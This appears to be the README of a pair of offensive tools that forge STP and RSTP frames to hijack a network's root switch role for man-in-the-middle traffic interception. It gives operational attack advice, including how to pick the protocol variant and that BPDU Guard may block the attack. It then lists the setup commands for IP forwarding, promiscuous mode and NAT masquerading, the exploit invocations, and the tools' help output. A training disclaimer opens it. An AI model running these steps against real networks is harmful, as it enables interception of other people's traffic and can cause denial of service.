STP & RSTP Root Hijacking Exploits
The author has nothing to do with those who will use these tools for personal purposes to destroy other people's computer networks. The tools are presented for training purposes to help engineers improve the security of their network.
ᛝ
The basic principle of the tools is to generate an STP/RSTP frame with the lowest priority value. Which in turn allows you to intercept the role of the root switch. After that, an opportunity will open for a MITM attack, you will partially intercept traffic, not all of it. Keep that in mind. But don't forget that the BPDU GUARD system can stop you.
Before performing the injection, you should first analyze what type of STP protocol is used. And based on this, to start further... By the way, nothing prevents an attack against the classic STP using an exploit for RSTP. If a MITM attack fails, feel free to experiment and try two versions of exploits at once (STP exploit for RSTP, RSTP exploit for STP) Also, after injection, switch will generate TCN messages (Topology Change Notification)
If there are any problems, write to "Issues"
Depending on the power of your hardware. some host traffic will go through you, you have to withstand this load, otherwise DoS will occur.
First you need to install the dependencies.
sudo pip3 install -r requirements.txt
sudo sysctl -w net.ipv4.ip_forward=1
sudo modprobe nf_conntrack
sudo echo "1" > /proc/sys/net/netfilter/nf_conntrack_helper
sudo ip link set ethX promisc on
sudo iptables -t nat -A POSTROUTING -o ethX -j MASQUERADE
sudo python3 stpexploit.py --interface ethX --mac XX:XX:XX:XX:XX:XX
sudo python3 rstpexploit.py --interface ethX --mac XX:XX:XX:XX:XX:XX
After executing the injection, you will intercept the role of the root switch. you can track generated STP ads in Wireshark or tcpdump :)
python3 stpexploit.py --help
▄████ ██▀███ ██▓▄▄▄█████▓
██▒ ▀█▒▓██ ▒ ██▒▓██▒▓ ██▒ ▓▒
▒██░▄▄▄░▓██ ░▄█ ▒▒██▒▒ ▓██░ ▒░
░▓█ ██▓▒██▀▀█▄ ░██░░ ▓██▓ ░
░▒▓███▀▒░██▓ ▒██▒░██░ ▒██▒ ░
░▒ ▒ ░ ▒▓ ░▒▓░░▓ ▒ ░░
░ ░ ░▒ ░ ▒░ ▒ ░ ░
░ ░ ░ ░░ ░ ▒ ░ ░
░ ░ ░
STP Root Hijacking Exploit
For the classic version of Spanning Tree Protocol
Author: Magama Bazarov, @in9uz, <in9uz@protonmail.com>
usage: stpexploit.py [-h] --interface INTERFACE --mac EVILMAC
options:
-h, --help show this help message and exit
--interface INTERFACE
Choose the interface to attack
--mac EVILMAC Specify your MAC
python3 rstpexploit.py --help
▄████ ██▀███ ██▓▄▄▄█████▓
██▒ ▀█▒▓██ ▒ ██▒▓██▒▓ ██▒ ▓▒
▒██░▄▄▄░▓██ ░▄█ ▒▒██▒▒ ▓██░ ▒░
░▓█ ██▓▒██▀▀█▄ ░██░░ ▓██▓ ░
░▒▓███▀▒░██▓ ▒██▒░██░ ▒██▒ ░
░▒ ▒ ░ ▒▓ ░▒▓░░▓ ▒ ░░
░ ░ ░▒ ░ ▒░ ▒ ░ ░
░ ░ ░ ░░ ░ ▒ ░ ░
░ ░ ░
RSTP Root Hijacking Exploit
For Rapid Spanning Tree Protocol version
Author: Magama Bazarov, @in9uz, <in9uz@protonmail.com>
usage: rstpexploit.py [-h] --interface INTERFACE --mac EVILMAC
options:
-h, --help show this help message and exit
--interface INTERFACE
--mac EVILMAC